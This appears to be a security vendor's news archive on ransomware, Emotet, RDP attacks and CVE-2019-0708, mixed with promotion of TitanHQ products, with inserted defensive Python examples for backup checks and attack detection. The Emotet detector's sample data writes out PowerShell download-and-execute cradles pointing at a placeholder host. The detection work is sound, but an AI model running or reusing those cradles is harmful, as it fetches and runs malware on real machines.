Our network security news section contains a range of articles relating to securing networks and blocking cyberattacks, ransomware and malware downloads. This section also features articles on recent network security breaches, alerting organizations to the latest attack trends being used by cybercriminals.
Layered cybersecurity defenses are essential given the increase in hacking incidents and the explosion in ransomware and malware variants over the past two years. Organizations can tackle the threat by investing in new security defenses such as next-generation firewalls, endpoint protection systems, web filtering solutions, and advanced anti-malware and antivirus defenses.
While much investment still goes on tried and tested solutions that were highly effective in the past, some of them, signature-based antivirus software in particular, are not as effective as they once were against polymorphic and fileless malware. In order to keep pace with hackers and cybercriminals and get ahead of the curve, organizations should consider a wider range of cybersecurity solutions to block network intrusions, prevent data breaches, and improve protection against the latest malware and ransomware threats.
This category contains information and advice on alternative network security solutions that can be adopted to improve network security and ensure networks are not infiltrated by hackers and infected with malicious software.
The dangers of ransomware attacks have been made abundantly clear to more than 5,000 patients in California whose medical records have been permanently lost as a result of a ransomware attack on their healthcare provider.
Simi Valley, CA-based Wood Ranch Medical experienced the attack on August 10, 2019, when ransomware was deployed and executed on the servers that held the medical records of 5,835 patients. The attack caused permanent damage to computer systems, and since the backup copies of patient records were also encrypted, those records have been permanently lost. It is unclear how much the attackers demanded as payment for the keys, or whether those keys would have worked had the ransom been paid.
Without patient records and faced with the prospect of having to totally rebuild the medical practice from scratch, the decision was taken to permanently close the business. Patients have been forced to find alternative healthcare providers and no longer have access to their medical records.
This is the second healthcare provider in the United States that has been forced out of business due to a ransomware attack. Brookside ENT and Hearing Center in Battle Creek, Michigan also closed its practice this year as a result of a ransomware attack. In that case, the practice owners refused to pay the ransom demand and patient records were permanently encrypted. The practice owners decided it was not possible to rebuild the practice from scratch and announced their early retirement.
It is unclear exactly how the ransomware was installed in each of these incidents, so it is not possible to determine what defenses could have been improved to prevent the attacks. However, in both cases, recovery of files from backups was not possible.
The purpose of a backup is to ensure that in the event of disaster, data will be recoverable. File recovery may be time consuming, and downtime caused by the attack is likely to be expensive, but data will not be permanently lost.
In order to ensure file recovery is possible, backups must be tested. Files may be corrupted during the backup process, a job may silently skip open or locked files, or the backup may no longer match the data it is supposed to protect, and none of this is visible until a restore is attempted. If backups are not restored and checked regularly, it is not possible to guarantee file recovery in the event of disaster.
These incidents also highlight another fundamental rule of backing up. NEVER store the only copy of a backup on a networked or internet-connected computer.
In the event of a ransomware attack, it is highly likely that backup copies on networked devices will be encrypted along with everything else the malware can reach. Most ransomware families also delete Volume Shadow Copies (for example with vssadmin) so that Windows' own restore points cannot be used. The aim is to make sure the only way of recovering data is paying the ransom.
Even paying a ransom comes with no guarantee that data will be recoverable. Files may be corrupted through the encryption/decryption process, the decryptor supplied may be buggy or painfully slow, and the attackers may not be able, or willing, to supply valid keys to decrypt files.
A good backup approach to adopt to prevent disasters such as these is the 3-2-1 strategy: keep 3 copies of the data (the live copy plus two backups), on 2 different types of media, with 1 copy stored securely off site or offline, on a device that cannot be reached from the network. A backup that sits on another server in the same domain does not count as that copy; an attacker holding domain administrator credentials can reach it just as easily as the production data.
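The "test your backups" rule above is easy to state and rarely automated. The following is an added example, not code from the article or from any backup product: it builds a SHA-256 manifest of a backup set and verifies a restored copy against it, reporting files that are missing, altered (as they would be after an encryption run) or unexpected. The directory names and file contents are constructed for the demo; in use, build_manifest() would point at the real backup source and verify_restore() at a scratch restore performed on a separate host.

```python
"""Added example (not from the original article): build a SHA-256 manifest of a
backup set and verify a restored copy against it. All paths and file contents
below are constructed for the demo; point build_manifest() at the real backup
source and verify_restore() at a scratch restore on a separate host."""
import hashlib
import json
import os
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file under root (relative POSIX path) to its size and SHA-256."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            rel = p.relative_to(root).as_posix()
            manifest[rel] = {"size": p.stat().st_size, "sha256": sha256_file(p)}
    return manifest


def verify_restore(manifest: dict, restored_root: Path) -> dict:
    """Compare a restored tree against the manifest.

    Returns missing, corrupt (size or hash mismatch) and unexpected files so a
    scheduled job can alert on any non-empty list. A backup that cannot pass
    this check is not a backup."""
    problems = {"missing": [], "corrupt": [], "extra": []}
    for rel, meta in manifest.items():
        target = restored_root / rel
        if not target.is_file():
            problems["missing"].append(rel)
        elif target.stat().st_size != meta["size"] or sha256_file(target) != meta["sha256"]:
            problems["corrupt"].append(rel)
    for p in restored_root.rglob("*"):
        if p.is_file() and p.relative_to(restored_root).as_posix() not in manifest:
            problems["extra"].append(p.relative_to(restored_root).as_posix())
    return problems


def demo() -> dict:
    """Run the whole cycle on constructed sample data and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        src, restored = Path(tmp) / "source", Path(tmp) / "restored"
        (src / "records").mkdir(parents=True)
        (src / "records" / "patient_001.txt").write_text("constructed sample record 1\n")
        (src / "records" / "patient_002.txt").write_text("constructed sample record 2\n")
        (src / "config.ini").write_text("[db]\nhost=localhost\n")

        manifest = build_manifest(src)
        # The manifest travels with the offline copy, never only on the source host.
        (Path(tmp) / "manifest.json").write_text(json.dumps(manifest, indent=2))

        shutil.copytree(src, restored)
        # Simulate what a ransomware run leaves on a networked backup share:
        # one file overwritten with ciphertext, one file gone.
        (restored / "records" / "patient_002.txt").write_bytes(os.urandom(64))
        (restored / "config.ini").unlink()
        return verify_restore(manifest, restored)


if __name__ == "__main__":
    print(demo())  # {'missing': ['config.ini'], 'corrupt': ['records/patient_002.txt'], 'extra': []}
```

The manifest is deliberately written alongside the offline copy rather than left on the source server: if only the source holds it, an attacker who encrypts the source also takes away the means of telling a good restore from a bad one. The size check before hashing is a cheap short-circuit for large archives.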
After a quiet summer, the Emotet botnet is back in action. The threat actors behind Emotet are sending hundreds of thousands of malicious spam emails spreading the Emotet Trojan via malicious Word documents.
Emotet first appeared in 2014 and was initially a banking Trojan used to obtain credentials to online bank accounts. The stolen credentials are used to make fraudulent wire transfers and empty business accounts. Over the years the Trojan has evolved considerably, with new modules being added to give the malware a host of new features. Emotet is also polymorphic, which means it can change itself each time it is downloaded to avoid being detected by signature-based anti-malware solutions. Up until the start of 2019, more than 750 variants of Emotet had been detected.
The latest iteration of Emotet is capable of stealing banking credentials and other types of information. It is also capable of downloading other malware variants, which has led to security researchers naming it ‘triple-threat malware,’ as it has been used recently to download the TrickBot Trojan and Ryuk ransomware. These three malware threats along with the scale of the operation make Emotet one of the most dangerous threats faced by businesses. It is arguably the costliest and most destructive botnet ever seen.
Last summer, Emotet activity was so high and the threat so severe that the Department of Homeland Security issued an alert to all businesses in July 2018 warning them of the threat. That warning was mirrored by the UK National Cyber Security Center which published its own warning about the malware in September 2018. Activity remained high well into 2019, but suddenly stopped at the start of June when command and control server activity fell to next to nothing.
The hiatus in activity was only brief. Researchers at Cofense Labs discovered its command and control servers had been activated again in late August and a massive spamming campaign commenced on September 16 using bots in Germany. The campaign was initially focused on businesses in the United States, Germany, and United Kingdom but the campaign has now spread to Austria, Italy, Poland, Spain, and Switzerland.
After being downloaded, Emotet spreads laterally and infects as many devices as possible on the network. Email accounts on infected machines are hijacked and used to send further spam emails to all contacts in the account. Finally, the malware downloader module is used to fetch a secondary, and often a tertiary, malware payload.
The latest campaign uses Word documents containing malicious macros, which launch PowerShell scripts that fetch the Emotet Trojan from a variety of different compromised websites, many of which are running the WordPress CMS.
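The macro-to-PowerShell-to-download chain above leaves a distinctive trace in process-creation telemetry: an Office binary as the parent of a script host, usually with a hidden window and an encoded command that, once decoded, contains a download cradle. The following is an added example, not code from the article, Cofense or any vendor product. It scores constructed events shaped like Sysmon Event ID 1 records (parent image, image, command line); the domain and file paths in the sample payload are placeholders.

```python
"""Added example (not from the original article): flag the Office -> script host
-> download chain in process-creation telemetry. The events are constructed to
look like Sysmon Event ID 1 fields; the host names and URLs are invented."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
DOWNLOAD_CUES = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"\bIEX\b|Invoke-Expression|BitsTransfer|https?://)", re.I)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None if the command line has none or it does not decode cleanly."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> list:
    """Return the reasons an event is suspicious (empty list means clean)."""
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["command_line"]
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{image}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_powershell")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden_window")
    # Look for a download cradle in the visible command line and, if present,
    # in the decoded payload, which is where Emotet-style scripts keep the URL.
    if DOWNLOAD_CUES.search(cmd + " " + (decoded or "")):
        reasons.append("download_cradle")
    return reasons


def scan(events: list) -> list:
    """Return (index, reasons) for each event with at least one reason."""
    hits = []
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry. The stage-2 script is the kind of thing a
# malicious macro hands to powershell.exe; the domain is a placeholder.
STAGE2 = ("$w=New-Object Net.WebClient;"
          "$w.DownloadFile('http://compromised.example/wp-content/uploads/x.php','C:\\Users\\Public\\svc.exe');"
          "Start-Process 'C:\\Users\\Public\\svc.exe'")
ENC = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc " + ENC},
    {"parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile Get-Process"},
    {"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\splwow64.exe",
     "command_line": "C:\\Windows\\splwow64.exe 12288"},
    {"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd /c powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://compromised.example/wp-includes/a.txt')"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, why)
```

Only the two Office-spawned events are reported; the explorer-launched PowerShell and the print spooler helper that Word legitimately starts stay quiet. The parent/child rule alone is the high-confidence signal; the encoded-command, hidden-window and cradle checks are what let you rank the hit and pull the stage-2 URL straight out of the alert.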
The campaign uses a variety of lures including invoices, payment remittance advice, and statements, the details of which are said to be contained in Word documents that require the user to enable content (that is, macros) before anything is shown.
Upon opening the document, the user is requested to accept the Office 365 license agreement. Failure to enable content, so the document claims, will result in Microsoft Word features being disabled.
This campaign uses personalized subject lines that include the recipient's name to increase the likelihood of a user taking the requested action. Genuine email threads are also hijacked to make it appear that the user has already been communicating with the sender of the email. Around a quarter of attacks use hijacked email threads. Data from Cofense indicates emails are being sent from 3,362 hijacked email accounts across 1,875 domains.
It is currently unclear whether Ryuk ransomware is being distributed in this campaign. Several researchers have confirmed that TrickBot is being downloaded as a secondary payload.
The key to blocking attacks with polymorphic malware is to implement layered defenses, including an advanced spam filtering solution, anti-virus software, and web filter. It is also important to ensure that the staff is made aware of the threat of attack and the types of email that are being used to spread the Trojan.
This fall, TitanHQ will be attending several Managed Service Provider (MSP) events and trade shows throughout Europe and the United States.
TitanHQ has been developing cybersecurity solutions for MSPs for more than two decades and all solutions have been created with MSPs firmly in mind. By involving MSPs in the design process, TitanHQ has been able to ensure that its products incorporate features that make life easier for MSPs, such as easy integration into MSP management systems through APIs, and features rarely found in cybersecurity products, such as full white-label versions ready for MSP branding and the ability to host the solutions within the MSP's own environment.
Trade shows give the TitanHQ team the opportunity to meet face to face with prospective clients to discuss their email and web security needs and get face to face feedback from current customers that have already integrated TitanHQ products into their technology stacks.
The TitanHQ team kicked off the fall schedule of trade shows on September 12 at the Taylor Business Group BIG 2019 Conference at the Westin Hotel in Chicago, where members got to meet the TitanHQ team to discuss the new TitanShield program and discover how TitanHQ products can improve security for their clients while saving MSPs time and money.
At the same time, TitanHQ was at the CloudSec Europe 2019 Conference in London demonstrating WebTitan Cloud, SpamTitan Cloud, and ArcTitan to MSPs and cloud service providers.
If you were unable to attend either of these two events or did not get the chance to meet with the team, all is not lost. The fall schedule has only just commenced and there are still plenty of opportunities to meet the team to discuss your requirements and find out how TitanHQ products can meet and exceed your expectations.
Trade Events Attended by TitanHQ – Autumn, 2019
September 17, 2019
September 18, 2019
October 6-10, 2019
October 7-8, 2019
CompTIA EMEA Show
October 16-17, 2019
Canalys Cybersecurity Forum
October 21-23, 2019
October 30, 2019
MSH Summit North
October 30, 2019
IT Nation Evolve (HTG 4)
October 30, 2019
IT Nation Connect
November 5-7, 2019
If you plan on attending any of the above events this fall, be sure to come and visit the TitanHQ team and feel free to reach out ahead of the events for further information.
Rocco Donnino, Executive Vice President-Strategic Alliances
Eddie Monaghan, MSP Alliance Manager
Marc Ludden, MSP Alliance Manager
Dryden Geary, Marketing Director
TitanHQ has announced it has entered into a new partnership with one of the United Kingdom's leading Managed Service Providers (MSPs), OneStopIT.
For more than 16 years, OneStopIT has been helping small to medium sized businesses (SMBs) implement enterprise-class technology solutions. The Edinburgh-based MSP is focused on providing process-driven IT solutions to growing organizations at an affordable price.
Through the company's dealings with UK businesses it has become clear that one of the biggest problem areas is phishing. Phishing attacks on UK businesses are now occurring at record pace and those attacks are costing businesses dearly.
UK businesses need advanced, enterprise-level cybersecurity solutions, but at an affordable SMB-friendly price. To improve protection against phishing and malware attacks, OneStopIT turned to TitanHQ.
TitanHQ has developed powerful cloud-based solutions for the SMB marketplace that incorporate enterprise-grade security features, but at a price that is affordable for even the smallest business. These solutions have been developed to be delivered by MSPs and can be easily incorporated into MSP auto-provisioning, billing, and management systems.
Under the new partnership, OneStopIT will be offering its customers SpamTitan-powered advanced email security and anti-phishing protection, WebTitan-powered DNS-based web filtering, and an ArcTitan-powered email archiving service.
All three solutions have been seamlessly integrated into OneStopIT’s security stack and are now being used to better protect its customers from today’s advanced and sophisticated cyber threats.
“The proliferation of phishing threats across Office 365 is a real problem for SMEs in the UK and we’re partnering with a key vendor in this space to protect our customers and also give them the OneStopIT premium service they are used to,” said Ally Hollins-Kirk, CEO of OneStopIT.
The largest managed service provider conference of 2019 will be taking place in San Diego on 17-19 June.
DattoCon is the premier conference for MSPs, bringing together a plethora of vendors and industry experts to help MSPs learn business building secrets, gain invaluable product insights, and learn technical best practices. The networking and learning opportunities at DattoCon are second to none. DattoCon19 is certainly an event not to be missed.
TitanHQ is a Datto Select Vendor and a proud sponsor of DattoCon19. TitanHQ has developed cybersecurity solutions to meet the specific needs of MSPs. All solutions are easy to implement and maintain and can be integrated into an MSP's existing systems via a suite of APIs. TitanHQ provides the web security layer to Datto DNA and D200 boxes and is the only third-party security company trusted to work with Datto.
The TitanHQ team will be on hand at the conference to discuss your email and web security needs and will offer practical advice to help you better serve the needs of your customers and get the very most out of TitanHQ solutions.
Visitors to the TitanHQ stand (booth 23) will have the opportunity to learn about TitanHQ’s exclusive TitanShield Program for MSPs. Through the TitanShield program, members have access to SpamTitan email security and phishing protection; the WebTitan DNS filter; and the ArcTitan email archiving solution. Around 2,000 MSPs have already signed up to the program and are using TitanHQ solutions to protect their clients.
If you currently use Cisco Umbrella to provide web and malware protection, you may be paying far more for security than is necessary and could well be struggling with product support. Be sure to speak to the team about the savings from switching and the support provided by TitanHQ. A visit will also be useful for MSPs that are currently supporting Office 365, as the team will explain how spam, phishing and malware protection can be enhanced.
TitanHQ Executive Vice President-Strategic Alliances, Rocco Donnino, will be on the panel for the new Datto Select Vendors event on Monday. The event runs from 3PM to 4PM and brings together experts from several select companies who will help solve some of the biggest problems faced by MSPs today.
Additional Benefits at DattoCon19
New TitanHQ customers benefit from special show pricing.
A daily raffle for a free bottle of vintage Irish whiskey.
Two DattoCon19 parties: TitanHQ and BVOIP are sponsoring a GasLamp District Takeover on Monday 6/17 and Wed, 6/19.
DattoCon19 will be taking place in San Diego, California on June 17-19, 2019
If you are not yet registered for the event you can do so here.
TitanHQ will be at booth 23
The global user review website, G2, is the go-to place to find reviews of business software and services. Unlike many other review websites, G2 gives users of the software and services the opportunity to provide their feedback on how the products perform. Millions of businesses use the website to make smarter buying decisions and select the best products and services to meet their needs.
This year, for the first time, G2 has launched a new Best Software Companies in EMEA list. To produce the list, G2 used the reviews of more than 66,000 users of the products of more than 900 companies. To be selected as one of the best companies is only possible if users of products and services have given their endorsement.
“G2’s ever-expanding breadth and depth of product, review, and traffic coverage provide over 5 million data points to help buyers navigate the complex world of digital transformation”, said G2 CEO Godard Abel. “In our Best Software Companies in EMEA list, we leverage this data to identify the companies our users tell us are best helping them reach their potential”.
TitanHQ has developed a suite of advanced cybersecurity solutions to keep businesses protected from email and web-based threats and help MSPs serving that market effortlessly provide managed cybersecurity services to their clients.
“TitanHQ earned its place on the list thanks to the value our customers place on the uncompromised security and real-time threat detection we provide,” said Ronan Kavanagh, CEO, TitanHQ. “The overwhelmingly positive feedback on G2 Crowd is indicative of our commitment to ensuring the highest levels of customer success.”
The use of ransomware to attack businesses continued to decline throughout 2018 after extensive use of the file-encrypting malware by cybercriminals in 2016 and 2017. In 2018, ransomware fell out of favor with cybercriminals, who turned to other forms of cybercrime to make money.
However, ransomware is seeing something of a resurgence in 2019. The latest Breach Insights Report from Beazley Breach Response Services shows ransomware attacks are increasing once again. In the first quarter of 2019, ransomware attack notifications from its clients increased by 105% from Q1, 2018. Ransom demands are also increasing.
The rise in attacks has continued in Q2. Attacks using MegaCortex ransomware surged in late April. The ransomware variant was first identified in January and was only used in a handful of attacks in the following three months, but in the last week in April, 47 confirmed attacks were reported.
Dharma ransomware attacks have similarly increased. According to Malwarebytes, the past two months have seen a 148% increase in attacks. The threat actors behind Dharma ransomware are now using a variety of methods to distribute their ransomware payload.
The most common method of distribution is phishing emails. Emails contain embedded hyperlinks that direct users to a malicious website where the ransomware payload is downloaded. Email attachments containing malicious scripts are also used to download the ransomware payload.
Attacks are also taking place via Remote Desktop Protocol (RDP), which listens on TCP port 3389 by default. Brute force attacks are conducted against internet-exposed RDP services to gain access to a device, after which the ransomware is deployed manually. Dharma ransomware has also been identified in fake antivirus software programs which are pushed via a variety of websites. Users are tricked into downloading the fake AV software after receiving a fake alert about a malware infection that has supposedly been detected on the user's device.
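The RDP brute-force path described above is loud in the Windows Security log long before the ransomware runs: a burst of failed logons (event 4625) from one address, then a success (event 4624) from the same address. The following is an added example, not code from the article or from Malwarebytes, that detects both stages over a constructed CSV export of those events; the addresses and account names are invented.

```python
"""Added example (not from the original article): detect an RDP password-guessing
run, and a guess that eventually worked, from Windows Security events. The CSV
below is constructed to mimic an export of events 4625 (failed logon) and 4624
(successful logon) with LogonType and source address; the data is invented."""
import csv
from collections import defaultdict, deque
from datetime import datetime, timedelta
from io import StringIO

SAMPLE_LOG = """\
time,event_id,logon_type,user,src_ip
2019-05-02T01:12:03,4625,10,administrator,203.0.113.45
2019-05-02T01:12:04,4625,10,admin,203.0.113.45
2019-05-02T01:12:04,4625,10,backup,203.0.113.45
2019-05-02T01:12:05,4625,10,sysadmin,203.0.113.45
2019-05-02T01:12:06,4625,10,administrator,203.0.113.45
2019-05-02T01:12:08,4624,10,administrator,203.0.113.45
2019-05-02T09:00:00,4625,10,jsmith,10.0.0.7
2019-05-02T09:00:41,4624,10,jsmith,10.0.0.7
2019-05-02T09:15:00,4624,2,jsmith,-
"""

RDP_LOGON_TYPES = {"10"}  # RemoteInteractive; see the note below about type 3


def detect_rdp_bruteforce(log_text: str, threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> list:
    """Alert when one source address produces `threshold` failed RDP logons inside
    `window`, and again if that address then logs on successfully."""
    failures = defaultdict(deque)  # src_ip -> timestamps of recent failures
    alerts = []
    for row in csv.DictReader(StringIO(log_text)):
        if row["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ts = datetime.fromisoformat(row["time"])
        recent = failures[row["src_ip"]]
        while recent and ts - recent[0] > window:  # drop failures outside the window
            recent.popleft()
        if row["event_id"] == "4625":
            recent.append(ts)
            if len(recent) == threshold:
                alerts.append({"type": "bruteforce", "src_ip": row["src_ip"],
                               "first_failure": recent[0].isoformat(), "count": len(recent)})
        elif row["event_id"] == "4624" and len(recent) >= threshold:
            # A success right after a burst of failures is the case that matters:
            # the operator now has an interactive session to deploy ransomware from.
            alerts.append({"type": "bruteforce_success", "src_ip": row["src_ip"],
                           "user": row["user"], "time": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_LOG):
        print(alert)
```

One caveat when porting this to a real log source: on hosts where Network Level Authentication is enabled, failed RDP attempts are recorded as 4625 with LogonType 3 (network) rather than 10, because the credential check happens before the session is created. A production rule should therefore also count type 3 failures arriving from outside the management network, which is what RDP_LOGON_TYPES is there to be extended with.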
Ransomware has also been used in conjunction with other malware such as Emotet. Emotet was once a banking Trojan but has since morphed into a botnet, capable of stealing login credentials, propagating itself via email on an infected device, and is capable of downloading other malware payloads. Emotet has been used to distribute Ryuk ransomware.
There have been upticks in attacks using other ransomware variants and the popularity of ransomware continues to grow, with some industries targeted more than others. Healthcare organizations are an attractive target as access to patient data is critical for providing medical services. There is a higher probability of ransom demands being paid due to reliance on patient data.
A recent report from Recorded Future has confirmed that attacks on towns, cities, and local government systems are soaring. Its study confirmed that there were 169 attacks on county, city, or state government systems and police and sheriffs’ offices since 2013. There were 38 ransomware attacks in 2017, 53 in 2018, and 22 attacks have already occurred in 2019 and the year is not yet halfway through.
Akron, OH; Albany, NY; Jackson County and Cartersville, GA; and Lynn, MA, have all been attacked this year, and the city of Baltimore, MD, has been struggling to recover from its attack for the past two weeks with many city services still disrupted.
The rise in attacks is understandable. The potential rewards from a successful attack are high, many victims have no alternative but to pay, and thanks to ransomware-as-a-service, attacks are easy to pull off and require little in the way of skill.
As long as the attacks continue to be profitable, they will continue. What businesses need to do is to make it much harder for the attacks to succeed and to ensure that if disaster does strike, recovery is possible without having to pay a ransom.
Recovery depends on viable backups of all critical files being available. That means regular backups must be made, those backups need to be tested to make sure files can be restored, and copies need to be stored securely where they cannot also be encrypted.
Remote Desktop Protocol is a weak point that is commonly exploited. If RDP is not required, it should be disabled. If disabling RDP is not an option, it should never be exposed directly to the internet: access should only be possible through a VPN, strong, unique passwords should be enforced together with an account lockout policy to blunt brute force attempts, and failed logon attempts should be monitored.
To block web-based attacks, consider implementing a web filtering solution such as WebTitan, which prevents users from visiting known malicious websites and downloading executable file types.
One of the primary methods of delivering ransomware is spam and phishing emails. An advanced spam filtering solution should be implemented to block malicious emails and ensure they are not delivered to end users’ inboxes. SpamTitan now incorporates a sandbox, which allows suspicious files to be executed in a secure environment where activities of the files can be safely analyzed for malicious actions. SpamTitan also scans outgoing mail for signs of infection with Emotet.
While these technical controls are important, you should not forget end users. By providing security awareness training and teaching end users how to recognize potential threats, they can be turned into a strong last line of defense.
Fortunately, with layered defenses you can make it much harder for ransomware attacks to succeed and can avoid becoming yet another ransomware statistic.
Shade ransomware was first identified by security researchers in 2014, when it was primarily being used in attacks on Russian businesses; however the threat actors behind this ransomware variant have broadened their horizons and attacks are now being conducted around the world. The United States is now the most attacked country followed by Japan, India, Thailand, and Canada. Russia has now fallen from top spot to seventh.
Shade ransomware, like many ransomware variants, is primarily spread via email. Emails are sent to businesses which appear at first glance to be invoices or bills. The emails contain links to websites hosting malicious files which are downloaded to the user’s device. A variant of this method uses a PDF attachment which contains a link inside which must be clicked to download a fake invoice or bill.
An analysis of the latest campaigns was recently conducted by Palo Alto Networks Unit 42 team. That analysis revealed the attackers are concentrating their attacks on high-tech companies, retailers, wholesalers, telecommunications, and educational institutions and the threat actors behind the campaigns have been highly active in 2019.
Since Shade ransomware is most commonly spread via spam email, to reduce the risk of an attack, businesses should implement an advanced email gateway solution that is capable of identifying and blocking the malspam emails that ultimately deliver Shade ransomware.
SpamTitan protects businesses from Shade ransomware and other email-based malware attacks. SpamTitan includes dual antivirus engines to detect malicious files attached to emails and scans the content of messages and subjects them to a Bayesian analysis and heuristics to identify signatures of spam and malicious messages.
The solution now incorporates a Bitdefender-powered sandbox feature which allows files to be opened in a safe and secure environment where they can be analyzed for malicious activity. The solution also allows users to block attachment types commonly used to deliver malware, such as zip archives, executables such as .exe, and script files such as .js.
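Blocking by extension is only useful if the check also looks inside archives and does not trust the extension alone. The following is an added example, not SpamTitan's code or any other product's, showing the shape of such a check: it walks a message's attachments, opens zip archives (to a bounded depth), flags encrypted members it cannot scan, and catches a PE executable that has been renamed to .pdf by its MZ header. The message, sender addresses and attachment contents are constructed for the demo.

```python
"""Added example (not SpamTitan's code): inspect a message's attachments the way
an attachment-policy layer would, including members inside zip archives and
executables hiding behind a harmless extension. The message, sender and file
contents are constructed for the demo."""
import email
import io
import zipfile
from email.message import EmailMessage
from email.policy import default

BLOCKED_EXT = {".exe", ".scr", ".com", ".pif", ".dll", ".js", ".jse", ".vbs", ".vbe",
               ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1", ".jar", ".lnk", ".iso"}
PE_EXT = {".exe", ".scr", ".com", ".pif", ".dll", ".sys", ".cpl", ".ocx"}
MAX_DEPTH = 3  # how many nested archives to open before giving up


def suffixes(name: str) -> list:
    """All extensions of a filename: 'invoice.pdf.js' -> ['.pdf', '.js']."""
    return ["." + p for p in name.lower().split(".")[1:]]


def inspect_blob(name: str, data: bytes, findings: list, where: str = "", depth: int = 0):
    label = where + name
    exts = suffixes(name)
    last = exts[-1] if exts else ""
    if last in BLOCKED_EXT:
        findings.append((label, f"blocked extension {last}"))
    # A PE file starts with 'MZ' whatever it is called; a .pdf with that header is a lie.
    if data[:2] == b"MZ" and last not in PE_EXT:
        findings.append((label, f"PE header but extension '{last or 'none'}'"))
    if data[:4] == b"PK\x03\x04":
        if depth >= MAX_DEPTH:
            findings.append((label, "archive nested too deeply to scan"))
            return
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir():
                        continue
                    if info.flag_bits & 0x1:  # encrypted member: cannot be scanned
                        findings.append((label + "!" + info.filename, "encrypted archive member"))
                        continue
                    inspect_blob(info.filename, zf.read(info), findings, label + "!", depth + 1)
        except zipfile.BadZipFile:
            findings.append((label, "malformed archive"))


def scan_message(raw: bytes) -> list:
    """Return (attachment label, reason) pairs; an empty list means deliver."""
    msg = email.message_from_bytes(raw, policy=default)
    findings = []
    for part in msg.iter_attachments():
        inspect_blob(part.get_filename() or "(unnamed)", part.get_payload(decode=True) or b"", findings)
    return findings


def build_sample_message() -> bytes:
    """Constructed invoice-themed lure with three attachments."""
    msg = EmailMessage()
    msg["From"] = "billing@supplier.example"
    msg["To"] = "accounts@victim.example"
    msg["Subject"] = "Invoice 3321 - payment remittance"
    msg.set_content("Please see the attached invoice and statement.")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:  # a script with a double extension, zipped
        zf.writestr("invoice_3321.pdf.js", "var s = new ActiveXObject('WScript.Shell');")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="invoice_3321.zip")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application", subtype="pdf", filename="statement.pdf")
    msg.add_attachment(b"meeting notes", maintype="application", subtype="octet-stream", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for label, reason in scan_message(build_sample_message()):
        print(label, "->", reason)
```

Two findings come back: the .js hidden inside the zip, and the fake PDF. Encrypted archive members are reported rather than ignored because a password-protected zip with the password in the email body is a standard way of getting a script past gateways that only scan what they can open.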
These and other protection mechanisms help to ensure that only legitimate emails are delivered and malicious messages are prevented from being delivered to end users’ inboxes.
If you want to protect your business against ransomware and malware attacks, contact TitanHQ today to find out more about SpamTitan and take the first step towards improving your security posture.
A critical Windows vulnerability has been identified which could be exploited in a WannaCry-style malware attack. The vulnerability can be triggered before authentication and requires no user interaction, which makes it wormable. A patch was issued by Microsoft on May 14, 2019 to correct the flaw. The patch should be applied immediately to prevent the flaw from being exploited.
A remote attacker could exploit the flaw to deliver malware to a vulnerable device and, by incorporating the exploit into the malware, move laterally and infect all vulnerable devices on the network.
The vulnerability, tracked as CVE-2019-0708, is in Remote Desktop Services (previously called Terminal Services) and requires a relatively low level of skill to exploit. To exploit the flaw, an attacker would need to send a specially crafted request to the Remote Desktop Service on a targeted device via RDP. Once exploited, an attacker could download malware and install other programs, view, change, or delete data, create new user accounts with admin privileges, and take full control of a vulnerable device. The vulnerability has been assigned a CVSS v3 base score of 9.8 out of 10.
